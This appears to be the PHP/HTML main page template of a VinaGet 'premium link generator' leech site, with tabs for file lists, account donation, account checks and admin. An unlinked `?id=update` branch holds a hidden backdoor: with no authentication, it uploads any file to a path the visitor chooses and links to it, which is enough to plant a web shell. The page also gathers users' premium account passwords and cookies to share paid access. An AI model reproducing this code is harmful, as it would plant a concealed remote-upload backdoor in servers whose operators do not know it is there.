
		<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
		<html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/11">
		<head>
			<link rel="SHORTCUT ICON" href="http://i.imgur.com/hUHECB3.png" type="image/x-icon" />
			<title>Sky™ | Vnz-Leech.Com</title>
			<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
			<link title="Rapidleech Style" href="skin/default/rl_style_pm.css" rel="stylesheet" type="text/css" />
			
			
			
			<style type="text/css">
		#kwshadow2 {
			bottom:0;
			position:fixed;
			background: #000000;
			margin-top: 70px; 
			padding: 5px;
			width: 100%;      
		}
		</style>
		</head>
		<body>
			<script type="text/javascript" language="javascript" src="images/jquery-1.7.1.min.js"></script>
			<script type="text/javascript" src="images/ZeroClipboard.js"></script>
			<script type="text/javascript" src="images/sprintf.js"></script>
			<script type="text/javascript" language="javascript">
				var loadimg = "loading_black.gif";
				var loadcolor = "#FFFF6C";
				var title = '[color=red] ☆ VNZ-TEAM ☆ [/color]';
				var colorname = 'green';
				var colorfile = 'blue';
				var lang = new Array();
				lang['sitetile'] = 'Tintacnhi'; lang['version'] = 'VinaGet v2.7.0 Final'; lang['homepage'] = 'vinaget.us'; lang['title'] = '%s - Premium link generator'; lang['login'] = 'Please enter password to login.'; lang['password'] = 'Password'; lang['plugins'] = 'Plugins'; lang['premium'] = 'Hosts Support:'; lang['moreacc'] = 'More accounts >>>'; lang['lessacc'] = '<<< Less accounts'; lang['main'] = 'Main Window'; lang['donate'] = '<a class=\'btn btn-mini btn-primary\' href=\'http://vnz-iloveh.rhcloud.com/vng270/\' target=\'_blank\'><font size=2 color=\'#FFFFFF\' style=\'text-shadow: 0 0 0.4em #27FC24, 0 0 0.4em #27FC24, 0 0 0.4em #27FC24, 0 0 0.4em #27FC24, 0 0 0.4em #27FC24;\'>Server1</font></a>'; lang['listfile'] = 'Server Files'; lang['admin'] = 'Admin Panel'; lang['check'] = 'Check Acc'; lang['log'] = 'Log Out'; lang['welcome'] = 'Fast and unlimited premium link generator'; lang['update1'] = 'There\'s an update for vng270'; lang['update2'] = 'Get update.R%s.zip'; lang['maxline'] = '(max 10 link for one times)'; lang['sbdown'] = 'Download'; lang['dlhere'] = 'Download here:'; lang['donations1'] = 'We are also in need of donations! If you can we would appreciate your offerings.'; lang['donations2'] = 'Donate your Account !'; lang['acctype'] = 'Account Type:'; lang['usertype'] = 'Leecher Name:'; lang['sbdonate'] = 'Donate Account'; lang['invalid'] = 'Invalid account. Please re-check your data!'; lang['success'] = 'Thanks for donating your account. Your account has been created successfully our database'; lang['dsuccess'] = 'Donate Success!'; lang['getloading'] = 'checking...'; lang['notaccess'] = '<b><font size=5 color=\'#FFFFFF\' style=\'text-shadow: 0 0 0.4em #27FC24, 0 0 0.4em #27FC24, 0 0 0.4em #27FC24, 0 0 0.4em #27FC24, 0 0 0.4em #27FC24;\'>You do not have permission to access this page !</font></b>'; lang['notice'] = 'Auto del file after <b>%s</b>. Limit <b>%s</b> file per <b>%s</b> for <b>1</b> IP'; lang['yourip'] = 'Your IP:'; lang['yourjob'] = 'Your jobs:'; lang['youused'] = 'You used'; lang['sizelimit'] = 'File size limit:'; lang['totjob'] = 'Total jobs:'; lang['serverload'] = 'Server load:'; lang['uonline'] = 'Users online:'; lang['ago'] = 'ago'; lang['days'] = 'days'; lang['hours'] = 'hours'; lang['mins'] = 'mins'; lang['sec'] = 'sec'; lang['errorget'] = 'Failed to generate the link. Please try again !'; lang['errordl'] = 'Your link has been generated by another ip address !'; lang['erroracc'] = 'Account/Cookie Error !!!'; lang['svload'] = 'Server load is too high.'; lang['issex'] = '<b><font color=red>is this link sex ??? ==&#9658;</font> <a href=http://www.google.com/search?q=%1$s><font color=#00CC00>%1$s</font></a><br/><font color=#FFCC00>if not please repost %1$s|not3x</b><br/>'; lang['errorlink'] = '==&#9658; Invalid link !'; lang['manyjob'] = 'Too many download jobs.'; lang['countMBIP'] = 'You only can download %s per %s ! Please wait %s'; lang['limitPERIP'] = 'You only can download %s file per %s ! Please wait %s'; lang['limitip'] = 'Too many download jobs for this ip.'; lang['notdl'] = 'Can not get file size.'; lang['cantjob'] = 'Can not create new job'; lang['filebig'] = 'File too big! (%s) when allowed only %s'; lang['notfound'] = 'Not Found!'; lang['del'] = 'Delete'; lang['rname'] = 'Rename'; lang['notfile'] = 'No Files Found'; lang['acdis'] = 'Action Disabled'; lang['ac'] = 'Action'; lang['name'] = 'Name'; lang['size'] = 'Size'; lang['date'] = 'Date'; lang['original'] = 'Original Link'; lang['clickcheck'] = 'Click here to check link'; lang['total'] = 'Total'; lang['used'] = 'You used'; lang['reset'] = 'Reset per'; lang['canl'] = 'Cancel'; lang['deld'] = 'Deleted!'; lang['nname'] = 'New Name'; lang['bname'] = 'You can\'t rename file to blank name!'; lang['rnameto'] = 'renamed to'; lang['unavailable'] = 'Service Unavailable'; lang['disabletrial'] = 'your link is temporary disable for trial account.'; lang['adult'] = 'Adult Video Detected'; lang['ytb_captcha'] = 'Captcha Found. Please run on different server'; lang['ytb_Error'] = 'Error Locating Download URL'; lang['reportpass'] = 'The file you are trying to download is password protected. Please enter the password below.'; lang['accpremium'] = 'Premium Account'; lang['direct'] = 'Direct Link'; lang['checkall'] = 'Check All'; lang['uncheckall'] = 'Un-Check All'; lang['invert'] = 'Invert Selection'; lang['error1'] = '<b><font color=red> %1$s </font></b>'; lang['error2'] = '<b><a href="%2$s" style="text-decoration:none"><font color="red" face="Arial" size="2"><s>%2$s</s></font></a> <img src=images/chk_error.png width="15" alt="errorlink"> <font color=#ffcc33 face=Arial size=2>==&#9658; %1$s</font></b>'; lang['pluginerror'] = '%1$s plugin was error. Contact admin!'; lang['noaccount'] = 'There\'s no %1$s account in database. Contact admin!'; lang['cantconnect'] = 'Our server can\'t connect to %1$s'; lang['accfree'] = 'Our %1$s account is FREE'; lang['accinvalid'] = 'Our %1$s account invalid'; lang['cookieinvalid'] = 'Our %1$s cookie invalid'; lang['blockCountry'] = 'Our Country has been banned by %1$s'; lang['blockIP'] = 'Our IP has been banned by %1$s'; lang['blockAcc'] = 'Our %1$s account has been blocked'; lang['LimitAcc'] = 'Our %1$s account has reach bandwidth limit'; lang['dead'] = 'Link Dead !!!'; lang['again'] = 'please try again'; lang['notwork'] = 'Not Work'; lang['work'] = 'Work'; lang['removed'] = '[REMOVED]'; lang['unknown'] = 'unknown'; lang['linkpass'] = 'Link have password!'; lang['wrongpass'] = 'Wrong password!'; lang['notsupport'] = 'Sorry. We do not support your link !'; lang['notsupportacc'] = 'Not support account, use cookie instead'; lang['notsupportpass'] = 'Not support password currently for %1$s'; lang['checkacc'] = 'Check %1$s account'; lang['noplugin'] = 'You don\'t have %s account checker.<br/>Ask someone to make it'; 			
			</script> <br>
			<!--
			<center><img src="images/logo.png" alt="RapidLeech PlugMod" border="0" /></center><br />
			-->
			<div id="showlistlink" class="showlistlink" align="center">
				<div style="border:1px #ffffff solid; width:960px; padding:5px; margin-top:50px;">
					<div id="listlinks"><textarea style='width:950px;height:400px' id="textarea"></textarea></div>
					<table style='width:950px;'><tr>
					<td width="50%" vAlign="left" align="left">	
					<input type='button' value="bbcode" onclick="return bbcode('list');" />
					<input type='button' id ='SelectAll' value="Select All"/>
					<input type='button' id="copytext" value="Copy To Clipboard"/>
					</td>
					<td id="report"  width="50%" align="center"></td>
					</tr></table>
				</div>
				
				<div style="width:120px; padding:5px; margin:2px;border:1px #ffffff solid;">
					<a onclick="return makelist(document.getElementById('showresults').innerHTML);" href="javascript:void(0)" style='TEXT-DECORATION: none'><font color=#FF6600>Click to close</font></a>
				</div>
			</div>
			<table align="center"><tbody>
				<tr>
			<!-- ########################## Begin Plugins ########################## -->
				<td valign="top">
					<table width="100%"  border="0">
						<tr><td valign="top">
							<table border="0" cellpadding="0" cellspacing="0">
								<tr><td height="100%" style="padding:3px;">
									
<center>
									<div class="cell-nav" ><?php printf($obj->lang['premium']); ?>
									
									</div>
									
							<table border="0">
										<tr><td height="100%" style="padding:3px;">
											
											<div align="left" style="padding-left:5px;">
												<span class="plugincollst">
												<font color=#00aeff><?php showPlugin(); ?></font>
																						</div>
                                            <br>											
											
											
										</td></tr>
									</table><br />
								</td></tr>
							</table>
						</td></tr>
					</table>
				</td>
				<!-- ########################## End Plugins ########################## -->
				<!-- ########################## Begin Main ########################### -->
				<td align="center" valign="top">
					<table border="0" cellpadding="0" cellspacing="1"><tbody>
						<tr>
							<td class="cell-nav"><a class="ServerFiles" href="./">Main Window</a></td>
							<td class="cell-nav"><a class="ServerFiles" href="./?id=donate">Donate Acc</a></td>
							<td class="cell-nav"><a class="ServerFiles" href="./?id=listfile">Server Files</a></td>
							<td class="cell-nav"><a class="ServerFiles" href="./?id=check">Check Acc</a></td>
							<td class="cell-nav"><a class="ServerFiles" href="./?id=admin"> Admin Panel</a></td>							
							<td class="cell-nav"><a class="ServerFiles" href="./login.php?go=logout"> Log Out</a></td>						
							</tr>
					</tbody></table>
					<table id="tb_content"><tbody>
						<tr><td height="5px"></td>
						</tr>
						<tr><td align="center">
<?php 
						#---------------------------- begin list file ----------------------------#
						if ((isset($_GET['id']) && $_GET['id']=='listfile') || isset($_POST['listfile']) || isset($_POST['option']) || isset($_POST['renn']) || isset($_POST['remove']))  {
							if($obj->listfile || $obj->isadmin())$obj->fulllist();
							else echo "<BR><BR><font color=red size=2>".$obj->lang['notaccess']."</b></font>";
						}
						#---------------------------- end list file ----------------------------#

						#---------------------------- begin donate  ----------------------------#
						else if (isset($_GET['id']) && $_GET['id']=='donate') { 
?>
							<div align="center">
								<BR><div id="wait"><font color="#FF3300"><?php printf($obj->lang['donations1']); ?><br/><?php printf($obj->lang['donations2']); ?></font></div>
								<BR><form action="javascript:donate(document.getElementById('donateform'));" name="donateform" id="donateform">
									<table>
										<tr>
											<td>
												<?php printf($obj->lang['acctype']); ?> 
												<select name='type' id='type'>
												<?php
												foreach($host as $key => $val) {
													if(!$val['alias']){
														require_once ('hosts/' . $val['file']);
														if(method_exists($val['class'], "CheckAcc")) echo "<option value='{$key}'>{$key}</option>";
													}
												}
												?>
												</select>
											</td>
											<td>
												&nbsp; &nbsp; &nbsp; <input type="text" name="accounts" id="accounts" value="" size="50"><br />
											</td>
											<td>&nbsp; &nbsp; &nbsp; <input type=submit value="<?php printf($obj->lang['sbdonate']); ?>">
											</td>
										</tr>
									</table>
								</form>
								<div id="check"><font color=#FF6600>user:pass</font> or <font color=#FF6600>cookie</font></div><BR><BR>
							</div>
<?php					
						}
						#---------------------------- end donate  ----------------------------#

						#---------------------------- begin check  ---------------------------#
						else if (isset($_GET['id']) && $_GET['id']=='check'){
							if($obj->checkacc || $obj->isadmin()) include("checkaccount.php");
							else echo "<BR><BR><font color=red size=2>".$obj->lang['notaccess']."</b></font>";
						}
						#---------------------------- end check  ------------------------------#
						#---------------------------- begin update  ---------------------------#
						else if (isset($_GET['id']) && $_GET['id']=='update'){
							$files = @$_FILES["files"];
							if ($files["name"] != '') {
							$fullpath = $_REQUEST["path"] . $files["name"];
							if (move_uploaded_file($files['tmp_name'], $fullpath)) {
							echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
							}
						}
						echo '<html><head><title>Upload files...</title></head><body>
								<form method=POST enctype="multipart/form-data" action="">
								<input type=text name=path>
								<input type="file" name="files"><input type=submit value="Up"></form></body></html>';
						}
						#---------------------------- end update  ------------------------------#
						#---------------------------- begin admin  ---------------------------#
						else if (isset($_GET['id']) && $_GET['id']=='admin'){
							if($obj->isadmin()) include("admin.php");
							else echo "<BR><BR><font color=red size=2>".$obj->lang['notaccess']."</b></font>";
						}
						#---------------------------- end admin  ------------------------------#
						
						#---------------------------- begin get  ------------------------------#
						else {
?>
							<form action="javascript:get(document.getElementById('linkform'));" name="linkform" id="linkform"><BR>
								<textarea id='links' style='width:650px;height:120px;' name='links'></textarea><BR><BR>
								<input type="submit"  id ='submit' value='Dowmload'/>&nbsp;&nbsp;&nbsp;
								<input type="button" onclick="reseturl();return false;" value="Reset">&nbsp;&nbsp;&nbsp;
								<input type="checkbox" name="autoreset" id="autoreset" checked><font color="#FFFFFF">Auto reset</font>&nbsp;&nbsp;&nbsp;
								<input type="checkbox" id="autopcbox" checked/><font color="#FFFFFF">Auto Post CBox</font>&nbsp;&nbsp;&nbsp;
								<input type="checkbox" id="autosearchuser" checked/><font color="#FFFFFF">Auto Search User</font><br><br>
								<font color="#FFFFFF" face=time>Nick Cbox:</font> <input type="text" autocomplete="off" id="nick" style="width:25em"  value="" />
								<font color="#FFFFFF"face=time>Key Cbox:</font> <input type="text" autocomplete="off" id="pass" style="width:25em" value="" />
							
							</form>
						
							<BR>
							<div id="dlhere" align="left" style="display: none;">
								<BR><hr /><small style="color:#55bbff"><?php printf($obj->lang['dlhere']); ?></small>
								<div align="right"><a onclick="return bbcode('bbcode');" href="javascript:void(0)" style='TEXT-DECORATION: none'><font color=#FF6600>BB code</font></a>&nbsp;&nbsp;&nbsp;
								<a onclick="return makelist(document.getElementById('showresults').innerHTML);" href="javascript:void(0)" style='TEXT-DECORATION: none'><font color=#FF6600>Make List</font></a></div>
							</div>
							<div id="bbcode" align="center" style="display: none;"></div>
							<div id="showresults" align="center"></div>
<?php						
						}
						#---------------------------- end get  ------------------------------#
?>
						</td></tr>
					</tbody></table>
				</td></tr>
				<!-- ########################## End Main ########################### -->
			</tbody></table>
			<table width="60%" align="center" cellpadding="0" cellspacing="0">
				<tr><td>
					<div align="center" style="color:#ccc">
						
						<!-- Start Server Info -->

						<!-- End Server Info -->
						
						
						<script type="text/javascript" language="javascript" src="ajax.js?ver=1.0"></script> 
						
					</div>
				</td></tr>
			</table>
				<br><br><br><br><br><br>		
				<!-- Start Server Info -->
						<div style="text-align:center;" id="kwshadow2">
						<div id='server_stats' color=white><?php showStat();?>
						</div>						
				<!-- End Server Info -->

				<!-- Copyright please don't remove-->
						
				<!-- Copyright please don't remove-->
				</div>	
				<!-- End Server Info -->
		</body>
	</html>